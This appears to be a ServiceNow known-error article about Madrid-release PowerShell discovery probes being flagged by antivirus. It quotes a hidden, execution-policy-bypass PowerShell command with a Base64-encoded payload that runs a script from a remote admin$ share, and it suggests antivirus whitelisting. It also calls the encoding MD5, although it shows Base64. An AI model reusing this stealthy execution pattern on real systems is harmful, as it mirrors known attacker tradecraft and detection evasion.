Notifications

2562 views

Description

Remote Execution framework is now used in Madrid for several Windows Powershell probes. The Powershell command is run with "-EncodedCommand" to encode the parameters with MD5, and that is seen as potentially malicious by Anti-Virus software, including Cloudstrike. This is in addition to using the $admin share and executing from the Temp folder, which can also be considered indicators of potentially malicious code. This is a false positive, but will prevent that probe running.

In Madrid, these probes have the new Execute script remotely field as true.

  • Windows - Active Connections
    This is used by the existing "Windows - ADM" multiprobes (change related to PRB1291020)
  • Windows - Azure
    This is triggered by the Windows 2016 Server classifier (change related to PRB1270477)

This causes PSScript.ps1 to use ExecuteRemote.ps1 to execute remotely instead of on the MID Server. The temporary filename will be "psscript_executeRemote_<GUID>.ps1", and will be deleted again immediately after the probe runs.

In the case of Cloudstrike, the use of EncodedCommand is the trigger, and an alert may look something like:

powershell -ExecutionPolicy ByPass -NonInteractive -WindowStyle Hidden -EncodedCommand JgAgAHsAbQBvAGQAZQAgAGMAbwBuACAAbABpAG4AZQBzAD0A
MQAgAGMAbwBsAHMAPQA5ADkAOQA5ADsAIAAgACYAIABcAFwAMQAwAC4AMgA0ADEALgAyADIALgA0ADcAXABhAGQAbQBpAG4AJABcAHQAZQBtAHAAXAB1AG4AcgBlAGcAaQBzAHQ
AZQByAGUAZABcAHAAcwBzAGMAcgBpAHAAdABfAGUAeABlAGMAdQB0AGUAUgBlAG0AbwB0AGUAXwA3AGQANABhAGMANAAyAGIALQAyAGMAZgBjAC0ANAA0ADcAMQAtAGEAOABmAD
cALQAzADUAOAA4ADYAYQA0ADgANwAwAGQAZgAuAHAAcwAxAH0A
After decoding the Encoded command (Base64):
& {mode con lines=1 cols=9999; & \\10.x.x.x\admin$\temp\unregistered\psscript_executeRemote_7d4ac42b-2cfc-4471-a8f7-35886a4870df.ps1}

When a script is copied and run on the target server, if the target's ExecutionPolicy is set at the MachinePolicy or UserPolicy scopes, then the script will not execute and the probe will fail.
For probes that have the "Execute script remotely" checkbox checked, scripts are copied to the target under the following conditions:

  1. The MID Server is configured to use WMI protocol
  2. The MID Server is configured to use WinRM protocol and the "Copy script to target" checkbox on the probe is checked

Steps to Reproduce

  1. On an instance upgraded to Madrid, scan a Windows Server 2016 target. That should get both probe to run.
  2. The target server may trigger anti-virus software for remote execution of the psscript_executeRemote_<GUID>.ps1 script and prevent the probe running.

Workaround

This problem has been fixed. If you are able to upgrade, review the Fixed In or Intended Fix Version fields to determine whether any versions have a planned or permanent fix.

Whitelisting in the Anti-Virus software based on script filename or contents may be possible.

There is a simple way to revert it. Go to the probe and uncheck the “Execute script remotely” checkbox, and replace the script in the probe parameter with the old version of the script which is attached to this PRB


Related Problem: PRB1328998

Seen In

SR - IRM - Audit Management - New York 2019 Q3
SR - IRM - GRC Profiles - Madrid 2019 Q2
SR - IRM - Policy and Compliance - Madrid 2019 Q2
SR - IRM - Risk Management - New York 2019 Q3

Intended Fix Version

New York

Fixed In

Madrid Patch 4

Safe Harbor Statement

This "Intended Fix Version" information is meant to outline ServiceNow's general product direction and should not be relied upon in making a purchasing decision. The information provided here is for information purposes only and may not be incorporated into any contract. It is not a commitment, promise, or legal obligation to deliver any material, code, or functionality. The development, release, and timing of any features or functionality described for our products remains at ServiceNow's sole discretion.

Associated Community Threads

There is no data to report.

Article Information

Last Updated:2019-08-20 01:33:42
Published:2019-07-17
discovery_probe_parameter_59224b72dbd532003398f1351d96196f.xmldiscovery_probe_parameter_7dfc5f870a000483000169d19b46c06d.xml